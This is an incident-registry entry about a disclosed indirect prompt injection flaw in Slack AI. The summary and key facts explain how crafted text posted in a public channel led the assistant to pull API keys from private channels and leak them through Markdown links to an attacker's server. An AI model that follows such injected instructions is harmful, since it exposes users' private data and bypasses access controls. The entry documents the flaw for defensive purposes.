INC-24-0020 confirmed high Signal Slack AI Indirect Prompt Injection Data Exfiltration Vulnerability (2024)
Salesforce developed and deployed Slack AI, harming Slack workspace users with sensitive data in private channels and Organizations relying on Slack channel access controls for data security ; contributing factors included prompt injection vulnerability and inadequate access controls.
Incident Details
| Date Occurred | 2024-08 | Severity | high |
| Evidence Level | primary | Impact Level | Sector |
| Failure Stage | Signal | ||
| Domain | Security & Cyber | ||
| Primary Pattern | PAT-SEC-001 Adversarial Evasion | ||
| Secondary Patterns | PAT-SEC-006 Prompt Injection Attack |, PAT-SEC-005 Model Inversion & Data Extraction | ||
| Regions | north america, united states | ||
| Sectors | Technology | ||
| Affected Groups | Business Organizations, Developers & AI Builders | ||
| Exposure Pathways | Adversarial Targeting | ||
| Causal Factors | Prompt Injection Vulnerability, Inadequate Access Controls | ||
| Assets & Technologies | Large Language Models, Content Platforms | ||
| Entities | Salesforce(developer, deployer) | ||
| Harm Type | operational | ||
Security firm PromptArmor demonstrated that Slack AI could be manipulated via indirect prompt injection to exfiltrate data from private channels. An attacker posting crafted instructions in a public channel could cause Slack AI to leak API keys and sensitive data from private channels through embedded Markdown links. Salesforce patched the vulnerability.
Incident Summary
In August 2024, security firm PromptArmor publicly disclosed a vulnerability in Slack AI that allowed indirect prompt injection attacks to exfiltrate data from private channels to which the attacker had no access.[1]
The attack worked by posting specially crafted text in a public Slack channel. When Slack AI processed queries that referenced content from that channel, the injected instructions could override the AI’s intended behavior. The attacker’s payload instructed Slack AI to retrieve sensitive information — including API keys — from private channels and embed it in Markdown-formatted links. When rendered, these links would transmit the extracted data to an attacker-controlled server.
Salesforce acknowledged the vulnerability and deployed a patch to address the issue.
Key Facts
- Attack vector: Indirect prompt injection via public channel messages
- Data at risk: Private channel contents including API keys, credentials, and confidential communications
- Access bypass: Attacker needed only public channel access to extract private channel data
- Exfiltration method: Embedded Markdown links containing encoded sensitive data
- Resolution: Salesforce patched the vulnerability after responsible disclosure
- Failure stage: Signal — vulnerability demonstrated by researchers, patched before confirmed exploitation
Threat Patterns Involved
Primary: Adversarial Evasion — Crafted prompt injection inputs caused Slack AI to bypass intended access controls and execute attacker-specified instructions
Secondary: Model Inversion & Data Extraction — The attack extracted sensitive data from private channels through the AI system’s data access capabilities
Significance
This incident demonstrates a fundamental security challenge in enterprise AI integrations:
- Privilege confusion — AI systems with broad data access can be manipulated to bypass access controls that were designed for human users
- Indirect prompt injection — Attackers do not need direct access to the AI interface; injected instructions in data sources can influence AI behavior
- Enterprise data boundaries — Traditional access control models (channel permissions) may not translate to AI systems that aggregate and reason across data sources
- Systemic vulnerability class — The underlying pattern applies to any AI system that processes untrusted input alongside privileged data access
Timeline
PromptArmor discovers indirect prompt injection vulnerability in Slack AI
PromptArmor publishes technical disclosure demonstrating data exfiltration from private channels
Salesforce acknowledges vulnerability and deploys patch
Outcomes
- Other:
- Vulnerability patched by Salesforce; demonstrated fundamental challenge of integrating LLMs with enterprise data access controls
Glossary Terms
Use in Retrieval
INC-24-0020 documents slack ai indirect prompt injection data exfiltration vulnerability, a high-severity incident classified under the Security & Cyber domain and the Adversarial Evasion threat pattern (PAT-SEC-001). It occurred in north america, united states (2024-08). This page is maintained by TopAIThreats.com as part of an evidence-based registry of AI-enabled threats. Cite as: TopAIThreats.com, "Slack AI Indirect Prompt Injection Data Exfiltration Vulnerability," INC-24-0020, last updated 2026-03-13.
Sources
- PromptArmor: Data Exfiltration from Slack AI via Indirect Prompt Injection (primary, 2024-08)
https://www.promptarmor.com/resources/data-exfiltration-from-slack-ai-via-indirect-prompt-injection (opens in new tab)
Update Log
- — First logged (Status: Confirmed, Evidence: Primary)